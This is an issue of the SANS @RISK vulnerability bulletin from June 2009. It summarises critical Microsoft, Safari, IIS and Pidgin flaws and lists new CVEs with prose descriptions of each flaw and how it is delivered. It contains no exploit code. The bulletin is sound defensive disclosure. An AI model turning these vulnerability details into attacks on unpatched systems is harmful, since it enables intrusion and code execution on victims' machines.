@RISK: The Consensus Security Vulnerability Alert

Volume: VIII, Issue: 24
June 11, 2009

A huge number of very critical Microsoft vulnerabilities this week, but don't ignore the Apple Safari problems.

Alan

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:

    Platform                                   Number of Updates and Vulnerabilities
    - ----------------------------------------   -------------------------------------
    Windows                                    7 (#7, #13, #14)
    Microsoft Office                           11 (#2, #3, #4, #12)
    Other Microsoft Products                   12 (#1, #5, #9, #11)
    Third Party Windows Apps                   3
    Solaris                                    3
    Aix                                        1
    Unix                                       2
    Cross Platform                             23 (#6, #8, #10)
    Web Application - Cross Site Scripting     4
    Web Application - SQL Injection            4
    Web Application                            9
    Network Device                             1

******************** Sponsored By Sourcefire, Inc. **********************

Your Network Security Isn't Good Enough Anymore

Today's threats-and networks-are dynamic. Unfortunately most network security systems are not.

Join Martin Roesch, Founder and CTO of Sourcefire(r) and Creator of Snort(r), in a series of seminars, as he shows why network security must include full network visibility, relevant context, and automated impact assessment to be effective.

More information http://www.sans.org/info/44693

*************************************************************************

TRAINING UPDATE
- - SANSFIRE in Baltimore 6/13-6/20 (24 long courses, 12 short courses) http://www.sans.org/sansfire09/event.php
- - Rocky Mountain SANS, July 7-13 (6 full-length hands-on courses) http://www.sans.org/rockymnt2009/event.php
- - SANS Boston, Aug 2-9 (6 full-length hands-on courses) https://www.sans.org/boston09/index.php
- - National Forensics Summit, July 6-14 http://www.sans.org/forensics09_summit/
Looking for training in your own community? http://sans.org/community/
Save 25% on all On-Demand training (30 full courses) - See samples at http://www.sans.org/ondemand/spring09.php
Plus Amsterdam, London, Dubai, Riyadh, Cairo, Melbourne, Canberra, and Singapore all in the next 90 days.
For a list of all upcoming events, on-line and live: www.sans.org

*************************************************************************

Table Of Contents
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)
Windows
Microsoft Office
Other Microsoft Products
Third Party Windows Apps
Solaris
Aix
Unix
Cross Platform
Web Application - Cross Site Scripting
Web Application - SQL Injection
Web Application
Network Device

************************* Sponsored Links ******************************

1) SANS Recommended Webcast Replay featuring Novell: Enabling a Productive, Mobile Workforce with Endpoint Security http://www.sans.org/info/44698

2) SANS Vendor Demo Spotlight: CA - Identity Lifecycle Management - Increase efficiency & reduce costs! Securely manage identities throughout their lifecycles with ease. http://www.sans.org/info/44703

3) Register Now for the Upcoming Webcast: How to Manage Endpoints in a Distributed, Cloud-based Environment. Sponsored by BigFix http://www.sans.org/info/44708

*************************************************************************

PART I Critical Vulnerabilities

Part I for this issue has been compiled by Rohan Kotian at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Widely Deployed Software
  • (3) CRITICAL: Microsoft Office Word Multiple Vulnerabilities (MS09-027)
  • Affected:
    • Microsoft Office 2000 Service Pack 3
    • Microsoft Office XP Service Pack 3
    • Microsoft Office 2003 Service Pack 3
    • 2007 Microsoft Office System Service Pack 1
    • 2007 Microsoft Office System Service Pack 2
    • Microsoft Office 2004 for Mac
    • Microsoft Office 2008 for Mac
    • Open XML File Format Converter for Mac
    • Microsoft Office Word Viewer 2003 Service Pack 3
    • Microsoft Office Word Viewer
    • Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 1
    • Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 2
  • Description: Microsoft Word contains multiple vulnerabilities in its file-format processing code, any of which a specially crafted Word document could exploit. Two are buffer overflow vulnerabilities in the way Word handles files with malformed records. Another is caused by improper boundary checks while Word parses vulnerable tags within a crafted document. Successful exploitation corrupts memory in such a way that an attacker can execute arbitrary code with the privileges of the current user. To exploit these flaws, an attacker might take one of the following actions: (a) create a webpage that downloads a malicious Word document from a server, and entice a user to visit that webpage; (b) send an email with a specially crafted Word document as an attachment and convince the user to open it. Note that, on recent versions of Microsoft Office, Word documents are not opened upon receipt without first prompting the user. Some technical details are publicly available for these vulnerabilities.

  • Status: Vendor confirmed, updates available.

  • References:
  • (4) CRITICAL: Microsoft Works Converter Buffer Overflow Vulnerability (MS09-024)
  • Affected:
    • Microsoft Office 2000 Service Pack 3
    • Microsoft Office XP Service Pack 3
    • Microsoft Office 2003 Service Pack 3
    • 2007 Microsoft Office System Service Pack 1
    • Microsoft Works version 8.5
    • Microsoft Works version 9
  • Description: The Microsoft Works Converter included with Microsoft Word is used to convert documents created by Microsoft Works into other formats. It has a buffer overflow vulnerability caused by the way it parses font names in specially crafted Works (.wps) files. Successful exploitation would lead to a denial of service condition or arbitrary code execution with the privileges of the current user. To exploit this flaw, an attacker might take one of the following actions: (a) create a webpage that downloads a malicious Works document from a server, and entice a user to visit that webpage; (b) send an email with a specially crafted Works document as an attachment and convince the user to open it. Note that on recent versions of Microsoft Office, documents are not opened upon receipt without user intervention.

  • Status: Vendor confirmed, updates available.

  • References:
  • (5) CRITICAL: Microsoft Active Directory Multiple Vulnerabilities (MS09-018)
  • Affected:
    • Microsoft Windows 2000 Server Service Pack 4
    • Microsoft Windows XP Professional Service Pack 2
    • Microsoft Windows XP Professional Service Pack 3
    • Microsoft Windows XP Professional x64 Edition Service Pack 2
    • Microsoft Windows Server 2003 Service Pack 2
    • Microsoft Windows Server 2003 x64 Edition Service Pack 2
    • Microsoft Windows Server 2003 SP2 (Itanium)
  • Description: Active Directory is Microsoft's implementation of the Lightweight Directory Access Protocol (LDAP), a network protocol designed to provide access to distributed directories, and is an integral part of several Microsoft products and operating systems. There are two vulnerabilities in the way the LDAP service handles specially crafted LDAP requests. The first issue is caused by memory being freed incorrectly when the LDAP service handles specially crafted LDAP or LDAPS (LDAP over SSL) requests; successful exploitation might allow an attacker to execute arbitrary code. The second issue is caused by improper memory management in the LDAP service while it processes specially crafted LDAP or LDAPS requests; successful exploitation leads to a denial of service condition.

  • Status: Vendor has confirmed, updates available.

  • References:
  • (7) CRITICAL: Microsoft Windows Print Spooler Multiple Vulnerabilities (MS09-022)
  • Affected:
    • Microsoft Windows 2000 Service Pack 4
    • Microsoft Windows XP Service Pack 2
    • Microsoft Windows XP Service Pack 3
    • Microsoft Windows XP Professional x64 Edition Service Pack 2
    • Microsoft Windows Server 2003 Service Pack 2
    • Microsoft Windows Server 2003 x64 Edition Service Pack 2
    • Microsoft Windows Server 2003 SP2 (Itanium)
    • Microsoft Windows Vista
    • Microsoft Windows Vista Service Pack 1
    • Microsoft Windows Vista Service Pack 2
    • Microsoft Windows Vista x64 Edition
    • Microsoft Windows Vista x64 Edition Service Pack 1
    • Microsoft Windows Vista x64 Edition Service Pack 2
    • Microsoft Windows Server 2008 for 32-bit
    • Microsoft Windows Server 2008 for 32-bit Service Pack 2
    • Microsoft Windows Server 2008 x64
    • Microsoft Windows Server 2008 x64 Service Pack 2
    • Microsoft Windows Server 2008 for Itanium Systems
    • Microsoft Windows Server 2008 for Itanium Systems Service Pack 2
  • Description: The Windows print spooler service (spoolsv.exe) is responsible for tasks related to print jobs, such as retrieving and loading the correct printer driver, scheduling a print job, and sending data to the printer. Multiple vulnerabilities have been identified in the service. The first issue is a buffer overflow vulnerability caused by improper parsing of certain printing data structures; successful exploitation might allow an attacker to execute arbitrary code. The second issue is an information disclosure vulnerability caused by inadequate checks, on the part of the Windows Printing Service, on the files that can be included with separator pages. The third issue is an elevation of privilege vulnerability caused by inadequate validation, on the part of the Windows Print Spooler service, of the paths from which a dynamic-link library (DLL) may be loaded; successful exploitation might lead to arbitrary code execution.

  • Status: Vendor has confirmed, updates available.

  • References:
  • (8) CRITICAL: Apple Safari Multiple Vulnerabilities
  • Affected:
    • Apple Safari versions prior to 4.0
  • Description: Apple's Safari web browser, installed by default on all recent versions of Mac OS X, contains multiple vulnerabilities. The first issue is a memory corruption vulnerability caused by improper garbage collection of JavaScript set elements in WebCore. The second is an uninitialized pointer issue caused by calling a method on an object that does not exist. The third issue is a memory corruption vulnerability caused by improper handling of the attr() function in a CSS content object. The fourth issue is an error in CFNetwork caused by misidentification of certain image files as HTML, leading to JavaScript execution. The fifth issue is an information disclosure vulnerability due to errors in CFNetwork. The sixth issue is caused by memory corruption errors in CoreGraphics while processing arguments. The seventh issue is also caused by memory corruption errors in CoreGraphics, but while handling TrueType fonts. The eighth issue is in FreeType v2.3.8, which has multiple integer overflows. The ninth issue is in the handling of malicious PDF files by CoreGraphics, which might lead to memory corruption. The tenth issue exists while handling PNG files and is caused by uninitialized pointers. The eleventh issue is caused by improper handling of certain character encodings by ICU. The twelfth issue is multiple vulnerabilities in libxml2 version 2.6.16. The thirteenth issue is a bypass of revocation checking caused by improper handling of EV certificates. The fourteenth issue is that the Reset button in Reset Safari may not remove website passwords from memory immediately. The fifteenth issue is an error in the Private Browsing feature. The sixteenth issue is an error in the open-help-anchor URL handler which may lead to disclosure of local file content. The seventeenth issue is an error in the Safari Windows Installer which might lead to Safari being run with elevated privileges for its initial launch.
There are also cross-site scripting, website spoofing, memory corruption and type conversion errors in Apple WebKit which might allow an attacker remote code execution. Some technical details for some of these vulnerabilities are publicly available.

  • Status: Vendor has confirmed, updates available.

  • References:
  • (9) HIGH: Microsoft Internet Information Services (IIS) WebDAV Authentication Bypass Vulnerabilities (MS09-020)
  • Affected:
    • Microsoft Internet Information Services 5.0
    • Microsoft Internet Information Services 5.1
    • Microsoft Internet Information Services 6.0
  • Description: Microsoft Internet Information Services (IIS), a set of Internet-based services for servers created by Microsoft, has elevation of privilege vulnerabilities. The specific flaw lies in the WebDAV plug-in (WebDAV is an extension of HTTP) of the affected IIS servers. The WebDAV plug-in does not decode the URLs in HTTP requests properly, which might result in WebDAV applying an incorrect configuration, one that allows anonymous access. A specially crafted HTTP request can thus bypass authentication. Some technical details about these vulnerabilities are publicly available.

  • Status: Vendor has confirmed, updates available.

  • References:
  • (10) MODERATE: MSN Protocol SLP Message Heap Overflow Vulnerability
  • Affected:
    • Adium 1.x
    • Pidgin version prior to 2.5.6
  • Description: Libpurple is a library implementing the Microsoft Network (MSN) Messenger protocol, which is used for instant messaging. Libpurple's implementation of this protocol is used by numerous clients, including Pidgin and Adium. Pidgin is installed by default on numerous Linux, UNIX, and Unix-like operating systems, and Adium is a popular instant messaging application for Apple Mac OS X. The libpurple MSN protocol implementation has a heap overflow vulnerability in its handling of SLP messages: the function "msn_slplink_process_msg()" does not adequately check the offset value in an SLP packet, so a specially crafted SLP packet can overflow a heap buffer. Successful exploitation might lead to arbitrary code execution.

  • Status: Vendor has confirmed, updates available.

  • References:
  • (11) MODERATE: Microsoft RPC Marshalling Engine Vulnerability (MS09-026)
  • Affected:
    • Microsoft Windows 2000 Service Pack 4
    • Microsoft Windows XP Service Pack 2
    • Microsoft Windows XP Service Pack 3
    • Microsoft Windows XP Professional x64 Edition Service Pack 2
    • Microsoft Windows Server 2003 Service Pack 2
    • Microsoft Windows Server 2003 x64 Edition Service Pack 2
    • Microsoft Windows Server 2003 SP2 (Itanium)
    • Microsoft Windows Vista
    • Microsoft Windows Vista Service Pack 1
    • Microsoft Windows Vista Service Pack 2
    • Microsoft Windows Vista x64 Edition
    • Microsoft Windows Vista x64 Edition Service Pack 1
    • Microsoft Windows Vista x64 Edition Service Pack 2
    • Microsoft Windows Server 2008 (32-bit)
    • Microsoft Windows Server 2008 (32-bit) Service Pack 2
    • Microsoft Windows Server 2008 (x64)
    • Microsoft Windows Server 2008 (x64) Service Pack 2
    • Microsoft Windows Server 2008 (Itanium)
    • Microsoft Windows Server 2008 (Itanium) Service Pack 2
  • Description: The Microsoft Windows Remote Procedure Call (RPC) Marshalling Engine, which provides a common RPC interface between RPC clients and servers, has an elevation of privilege vulnerability. The specific flaw is caused by the RPC Marshalling Engine not updating its internal state appropriately, so that a specially crafted RPC message causes a pointer to be read from an incorrect location. Successful exploitation might allow an attacker to execute arbitrary code. Note that Microsoft Windows is not delivered with any RPC servers or clients that expose this flaw, so in the default configuration users cannot be exploited by this vulnerability; however, the vulnerability could affect third-party RPC applications. Some technical details about this vulnerability are publicly available.

  • Status: Vendor has confirmed, updates available.

  • References:
  • (12) MODERATE: Microsoft PowerPoint Freelance parsing Vulnerability
  • Affected:
    • Microsoft Office PowerPoint 2000
    • Microsoft Office PowerPoint 2002
  • Description: Microsoft Office PowerPoint, a presentation program from Microsoft, has a heap-based buffer overflow vulnerability. Specially crafted Freelance files can trigger this vulnerability when viewed or opened. The flaw is caused by an array indexing error in the Microsoft PowerPoint Freelance Windows 2.1 Translator "FL21WIN.DLL" while parsing layout information. Successful exploitation might lead to arbitrary code execution. Note that systems with MS09-017 applied are not vulnerable to this, since that update disables support for Freelance files by default, thereby blocking the opening of Freelance files; however, the support can be re-enabled via a key in the registry. Microsoft has stated that no fix will be issued for this, so users who have enabled Freelance file support should not open Freelance files from untrusted sources.

  • Status: Vendor has confirmed, no updates available.

  • References:
  • (13) LOW: Microsoft Windows Kernel Local Elevation of Privilege Vulnerabilities (MS09-025)
  • Affected:
    • Microsoft Windows 2000 Service Pack 4
    • Microsoft Windows XP Service Pack 2
    • Microsoft Windows XP Service Pack 3
    • Microsoft Windows XP Professional x64 Edition Service Pack 2
    • Microsoft Windows Server 2003 Service Pack 2
    • Microsoft Windows Server 2003 x64 Edition Service Pack 2
    • Microsoft Windows Server 2003 SP2 (Itanium)
    • Microsoft Windows Vista
    • Microsoft Windows Vista Service Pack 1
    • Microsoft Windows Vista Service Pack 2
    • Microsoft Windows Vista x64 Edition
    • Microsoft Windows Vista x64 Edition Service Pack 1
    • Microsoft Windows Vista x64 Edition Service Pack 2
    • Microsoft Windows Server 2008 (32-bit)
    • Microsoft Windows Server 2008 (32-bit)
    • Microsoft Windows Server 2008 (x64)
    • Microsoft Windows Server 2008 (x64) Service Pack 2
    • Microsoft Windows Server 2008 (Itanium)
    • Microsoft Windows Server 2008 (Itanium) Service Pack 2
  • Description: The Microsoft Windows Kernel, the core of the operating system that provides system level services, has multiple elevation of privilege vulnerabilities. The first issue is an error in the way the Windows kernel validates changes in certain kernel objects. The second issue is caused by inadequate validation of pointers passed from user mode. The third issue is caused by inadequate validation of an argument passed to a system call. The fourth issue is due to inadequate checks on input from user mode while editing a specific desktop parameter. Successful exploitation might allow an attacker to run arbitrary code in kernel mode. Some technical details for these vulnerabilities are publicly available.

  • Status: Vendor has confirmed, updates available.

  • References:
  • (14) LOW: Microsoft Windows Search Information Disclosure Vulnerability (MS09-023)
  • Affected:
    • Microsoft Windows XP Service Pack 2
    • Microsoft Windows XP Service Pack 3
    • Microsoft Windows XP Professional x64 Edition Service Pack 2
    • Microsoft Windows Server 2003 Service Pack 2
    • Microsoft Windows Server 2003 x64 Edition Service Pack 2
  • Description: Microsoft Windows Search, a feature that provides instant search of files, e-mails, contacts, etc., has an information disclosure vulnerability. The specific flaw is caused by Windows Search not adequately restricting the environment within which scripts are executed. Successful exploitation might allow an attacker to run a malicious script. Note that the Windows Search component is not preinstalled by default on Microsoft Windows XP and Microsoft Windows Server 2003.

  • Status: Vendor has confirmed, updates available.

  • References:
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 24, 2009

This list is compiled by Qualys ( www.qualys.com ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 7103 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.
  • 09.24.1 - CVE: CVE-2009-1124
  • Platform: Windows
  • Title: Microsoft Windows Pointer Validation Local Privilege Escalation
  • Description: Microsoft Windows is exposed to a local privilege escalation vulnerability that occurs in the Windows kernel. This issue occurs because the software fails to properly validate certain pointers passed from user mode to kernel mode.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-025.mspx

  • 09.24.2 - CVE: CVE-2009-1125
  • Platform: Windows
  • Title: Microsoft Windows Argument Validation Local Privilege Escalation
  • Description: Microsoft Windows is exposed to a local privilege escalation issue that occurs in the Windows kernel. This issue occurs because the software fails to properly validate arguments passed to a system call. An attacker can exploit this issue to execute arbitrary code with kernel-level privileges.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-025.mspx

  • 09.24.3 - CVE: Not Available
  • Platform: Windows
  • Title: Microsoft Windows DNS Devolution Third-Level Domain Name Resolving Weakness
  • Description: DNS devolution is a feature of the Microsoft Windows DNS client application. It allows Windows DNS clients to resolve DNS queries for single-label unqualified hostnames by progressively removing subdomains until the single-label hostname is found. A single-label hostname is a name that does not contain a suffix such as ".com" or ".net". Windows is exposed to a weakness that affects the Windows DNS client and arises because of a design error in the DNS devolution process. This issue may allow an attacker to host systems outside of the organizational boundary, but the resolver will treat the systems as internal to the organization's boundary.
  • Ref: http://www.microsoft.com/technet/security/advisory/971888.mspx

  • 09.24.4 - CVE: CVE-2009-0228
  • Platform: Windows
  • Title: Microsoft Windows Print Spooler Remote Buffer Overflow
  • Description: Print Spooler is a service in Microsoft Windows that manages the printing process. The Print Spooler service is exposed to a buffer overflow issue because the software fails to properly parse certain printing data structures. Specifically, "ShareName" values aren't handled properly during enumeration.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-022.mspx

  • 09.24.5 - CVE: CVE-2009-0229
  • Platform: Windows
  • Title: Microsoft Windows Print Spooler Local Information Disclosure
  • Description: Print Spooler is a service in Microsoft Windows that manages the printing process. The Print Spooler service is exposed to a local information disclosure issue because it fails to put any restrictions on the files that can be included from separator pages. Specifically, the Windows Printing Service allows users to include any file on the local system.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-022.mspx

  • 09.24.6 - CVE: CVE-2009-0230
  • Platform: Windows
  • Title: Microsoft Windows Print Spooler Remote Code Execution
  • Description: Print Spooler is a service in Microsoft Windows that manages the printing process. The Print Spooler service is exposed to a remote code execution issue because it fails to validate the paths from which a DLL may be loaded.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-022.mspx

  • 09.24.7 - CVE: CVE-2009-0239
  • Platform: Windows
  • Title: Microsoft Windows Search Script Injection
  • Description: Microsoft Windows Search is a search solution for Windows-based systems. Microsoft Windows Search is exposed to a script injection issue because it fails to adequately sanitize user-supplied input when previewing search results. Successful exploits will cause malicious script code to run in the local context, allowing attackers to steal potentially sensitive information or perform other attacks. Windows Search installed on any supported edition of Windows XP or Windows Server 2003 is affected.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-023.mspx

  • 09.24.8 - CVE: CVE-2009-1533
  • Platform: Microsoft Office
  • Title: Microsoft Office Works for Windows Document Converters Remote Code Execution
  • Description: Microsoft Office Works for Windows document converters are used by Microsoft Office applications to interact with documents in the Microsoft Works file format. Microsoft Office Works for Windows document converters are exposed to a remote code execution issue because the application fails to properly handle specially crafted files. The vulnerability occurs when the application processes a specially crafted ".wps" file and fails to adequately bounds check user-supplied data before copying it into a stack-based buffer.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-024.mspx

  • 09.24.9 - CVE: CVE-2009-0563
  • Platform: Microsoft Office
  • Title: Microsoft Word Record Parsing (CVE-2009-0563) Remote Code Execution
  • Description: Microsoft Word is a word processor available for multiple platforms. Word is exposed to a remote code execution issue that stems from a buffer overflow condition when the application processes a specially crafted Word file with a malformed record value.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-027.mspx

  • 09.24.10 - CVE: CVE-2009-0565
  • Platform: Microsoft Office
  • Title: Microsoft Word Record Parsing (CVE-2009-0565) Remote Code Execution
  • Description: Microsoft Word is a word processor available for multiple platforms. Word is exposed to a remote code execution issue that stems from a buffer overflow condition when the application processes a specially crafted Word file with a malformed record value.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-027.mspx

  • 09.24.11 - CVE: CVE-2009-0549
  • Platform: Microsoft Office
  • Title: Microsoft Excel Record Pointer Corruption Remote Code Execution
  • Description: Microsoft Excel is a spreadsheet application that is part of the Microsoft Office suite. Excel is exposed to a remote code execution issue that occurs when the application parses an Excel file that contains a malformed record object.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-021.mspx

  • 09.24.12 - CVE: CVE-2009-0557
  • Platform: Microsoft Office
  • Title: Microsoft Excel Record Object Remote Code Execution
  • Description: Microsoft Excel is a spreadsheet application that is part of the Microsoft Office suite. Excel is exposed to a remote code execution issue when parsing malformed Excel files. This issue occurs because of memory corruption when the application handles a specially crafted record object.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-021.mspx

  • 09.24.13 - CVE: CVE-2009-0558
  • Platform: Microsoft Office
  • Title: Microsoft Excel Array Indexing Remote Code Execution
  • Description: Microsoft Excel is a spreadsheet application that is part of the Microsoft Office suite. Excel is exposed to a remote code execution issue when parsing malformed Excel files. This issue occurs because of memory corruption when the application handles a specially crafted record object.
  • Ref: http://www.securityfocus.com/archive/1/504188

  • 09.24.14 - CVE: CVE-2009-0559
  • Platform: Microsoft Office
  • Title: Microsoft Excel String Copy Stack Overflow Remote Code Execution
  • Description: Microsoft Excel is a spreadsheet application that is part of the Microsoft Office suite. Excel is exposed to a remote code execution issue when parsing malformed Excel files. Memory may become corrupted because a string copy operation could trigger a stack-based buffer overflow when the application handles a specially crafted Excel file.
  • Ref: http://www.securityfocus.com/archive/1/504180

  • 09.24.15 - CVE: CVE-2009-0560
  • Platform: Microsoft Office
  • Title: Microsoft Excel Field Sanitization Remote Code Execution
  • Description: Microsoft Excel is a spreadsheet application that is part of the Microsoft Office suite. Excel is exposed to a remote code execution issue when parsing malformed Excel files. This issue occurs because the software fails to properly handle malformed data in an unspecified field, which can lead to memory corruption.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-021.mspx

  • 09.24.16 - CVE: CVE-2009-0561
  • Platform: Microsoft Office
  • Title: Microsoft Excel Malformed Record Object Integer Overflow
  • Description: Microsoft Excel is a spreadsheet application that is part of the Microsoft Office suite. Excel is exposed to an integer overflow issue when parsing malformed Excel files. This issue occurs because the software fails to properly handle data in a malformed record object, which can lead to memory corruption.
  • Ref: http://www.securityfocus.com/archive/1/504190

  • 09.24.17 - CVE: CVE-2009-1134
  • Platform: Microsoft Office
  • Title: Microsoft Excel Record Pointer Corruption Variant Remote Code Execution
  • Description: Microsoft Excel is a spreadsheet application that is part of the Microsoft Office suite. Excel is exposed to a remote code execution issue when parsing malformed Excel files. This issue occurs because of memory corruption when the application handles a specially crafted record object.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-021.mspx

  • 09.24.18 - CVE: CVE-2009-0202
  • Platform: Microsoft Office
  • Title: Microsoft PowerPoint Freelance Layout Parsing Heap Based Buffer Overflow
  • Description: Freelance files are presentation files used with Lotus Freelance Graphics which is a presentation software as part of the Lotus SmartSuite collection. They can be translated and used with Microsoft PowerPoint. Microsoft PowerPoint is exposed to a heap-based buffer overflow issue that affects the Microsoft PowerPoint Freelance Windows 2.1 Translator ("FL21WIN.DLL").
  • Ref: http://secunia.com/secunia_research/2009-29/

  • 09.24.19 - CVE: CVE-2009-1141
  • Platform: Other Microsoft Products
  • Title: Microsoft Internet Explorer (CVE-2009-1141) Uninitialized Memory Remote Code Execution
  • Description: Microsoft Internet Explorer is a browser for the Windows operating system. Internet Explorer is exposed to a remote code execution issue that arises when the application displays a webpage containing unexpected calls to HTML objects. Successful exploits will allow the attacker to execute arbitrary code in the context of the user running the application, which can compromise the application and possibly the computer.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-019.mspx

  • 09.24.20 - CVE: CVE-2009-1140
  • Platform: Other Microsoft Products
  • Title: Microsoft Internet Explorer Cached Content Cross Domain Information Disclosure
  • Description: Microsoft Internet Explorer is a web browser available for Microsoft Windows. The browser is exposed to a cross-domain information disclosure issue because it fails to properly enforce the same-origin policy. Specifically, it fails to prevent cached content from being rendered as HTML.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-019.mspx

  • 09.24.21 - CVE: CVE-2009-0568
  • Platform: Other Microsoft Products
  • Title: Microsoft RPC Marshalling Engine Remote Code Execution
  • Description: Microsoft Windows RPC Marshalling Engine is a component that provides a common RPC interface between RPC clients and servers. RPC Marshalling Engine is exposed to a remote code execution issue because it fails to properly update the internal state, causing a pointer to be read from an incorrect location.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-026.mspx

  • 09.24.22 - CVE: CVE-2009-1528
  • Platform: Other Microsoft Products
  • Title: Microsoft Internet Explorer (CVE-2009-1528) Uninitialized Memory Remote Code Execution
  • Description: Microsoft Internet Explorer is a browser for the Windows operating system. Internet Explorer is exposed to a remote code execution issue that arises when it tries to access uninitialized memory related to HTML objects. Attackers can exploit this issue to execute arbitrary code in the context of the user running the browser. Successful exploits will compromise the browser and possibly the computer.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-019.mspx

  • 09.24.23 - CVE: CVE-2009-1529
  • Platform: Other Microsoft Products
  • Title: Microsoft Internet Explorer (CVE-2009-1529) Uninitialized Memory Remote Code Execution
  • Description: Microsoft Internet Explorer is a browser for the Windows operating system. Internet Explorer is exposed to a remote code execution issue that arises when it tries to access objects that haven't been properly initialized or have been deleted. The attacker can exploit this issue to execute arbitrary code in the context of the user running the browser. Successful exploits will compromise the browser and possibly the computer.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-019.mspx

  • 09.24.24 - CVE: CVE-2009-1530
  • Platform: Other Microsoft Products
  • Title: Microsoft Internet Explorer (CVE-2009-1530) Uninitialized Memory Remote Code Execution
  • Description: Microsoft Internet Explorer is a browser for the Windows operating system. Internet Explorer is exposed to a remote code execution issue that arises when it tries to access HTML objects that have not been initialized or have been deleted. Successful exploits will allow the attacker to execute arbitrary code in the context of the user running the browser. Successful exploits will compromise the browser and possibly the computer.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-019.mspx

  • 09.24.25 - CVE: CVE-2009-1531
  • Platform: Other Microsoft Products
  • Title: Microsoft Internet Explorer (CVE-2009-1531) Uninitialized Memory Remote Code Execution
  • Description: Microsoft Internet Explorer is a browser for the Windows operating system. Internet Explorer is exposed to a remote code execution issue that arises when it tries to access HTML objects that haven't been properly initialized or have been deleted. The attacker can exploit this issue to execute arbitrary code in the context of the user running the browser. Successful exploits will compromise the browser and possibly the computer.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-019.mspx

  • 09.24.26 - CVE: CVE-2009-1532
  • Platform: Other Microsoft Products
  • Title: Microsoft Internet Explorer (CVE-2009-1532) Uninitialized Memory Remote Code Execution
  • Description: Microsoft Internet Explorer is a browser for the Windows operating system. Internet Explorer is exposed to a remote code execution issue that arises when it tries to access HTML objects that haven't been properly initialized or have been deleted. The attacker can exploit this issue to execute arbitrary code in the context of the user running the browser. Successful exploits will compromise the browser and possibly the computer.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS09-019.mspx

  • 09.24.27 - CVE: CVE-2008-0024
  • Platform: Other Microsoft Products
  • Title: Microsoft Visual Studio "MSCOMM32.OCX" ActiveX Control Heap Buffer Overflow
  • Description: Microsoft Visual Studio is a suite of tools for software development. Visual Studio is exposed to a heap-based buffer overflow issue that affects the "MSCOMM32.OCX" ActiveX control. Successful exploits will allow attackers to execute arbitrary code within the context of the affected application that uses the ActiveX control (typically Internet Explorer).
  • Ref: http://www.iss.net/threats/328.html

  • 09.24.28 - CVE: CVE-2009-1139
  • Platform: Other Microsoft Products
  • Title: Microsoft Active Directory Memory Leak Denial of Service
  • Description: Microsoft Active Directory is an LDAP (Lightweight Directory Access Protocol) implementation distributed with multiple Windows operating systems. The application is exposed to a denial of service issue that stems from improper memory management when processing specially crafted LDAP or LDAPS requests containing specific Object Identifier (OID) filters.
  • Ref: http://www.microsoft.com/technet/security/bulletin/ms09-018.mspx

  • 09.24.29 - CVE: CVE-2009-1138
  • Platform: Other Microsoft Products
  • Title: Microsoft Active Directory Memory Corruption Remote Code Execution
  • Description: Microsoft Active Directory is an LDAP (Lightweight Directory Access Protocol) implementation distributed with multiple Windows operating systems. Microsoft Active Directory is exposed to a remote code execution issue because the software fails to properly free memory when handling specially crafted LDAP or LDAPS requests.
  • Ref: http://www.microsoft.com/technet/security/bulletin/ms09-018.mspx

  • 09.24.30 - CVE: CVE-2009-1122
  • Platform: Other Microsoft Products
  • Title: Microsoft IIS 5.0 WebDAV Authentication Bypass
  • Description: Microsoft Internet Information Services (IIS) is a webserver available for Microsoft Windows. The application is exposed to an authentication bypass issue because the WebDAV extension for IIS fails to properly enforce access restrictions on certain requests to a site that requires authentication. IIS version 5.0 is affected.
  • Ref: http://www.microsoft.com/technet/security/bulletin/ms09-020.mspx

  • 09.24.31 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: SAP AG SAPgui "sapirrfc.dll" ActiveX Control Buffer Overflow
  • Description: SAP AG SAPgui is a graphical user interface (GUI) included in various SAP applications. The application is exposed to a remote buffer overflow issue because it fails to perform adequate boundary checks on user-supplied data. SAPgui version 6.4 is affected.
  • Ref: http://www.securityfocus.com/archive/1/504141

  • 09.24.32 - CVE: CVE-2008-2475
  • Platform: Third Party Windows Apps
  • Title: eBay Enhanced Picture Services ActiveX Control Remote Code Execution
  • Description: eBay Enhanced Picture Service ActiveX control is an application that allows a seller to upload pictures to an auction. The application is available for Microsoft Windows. The eBay Enhanced Picture Services ActiveX control is exposed to a remote code execution issue. Successfully exploiting this issue will allow attackers to execute arbitrary code within the context of the affected application that uses the ActiveX control.
  • Ref: http://www.securityfocus.com/bid/35266

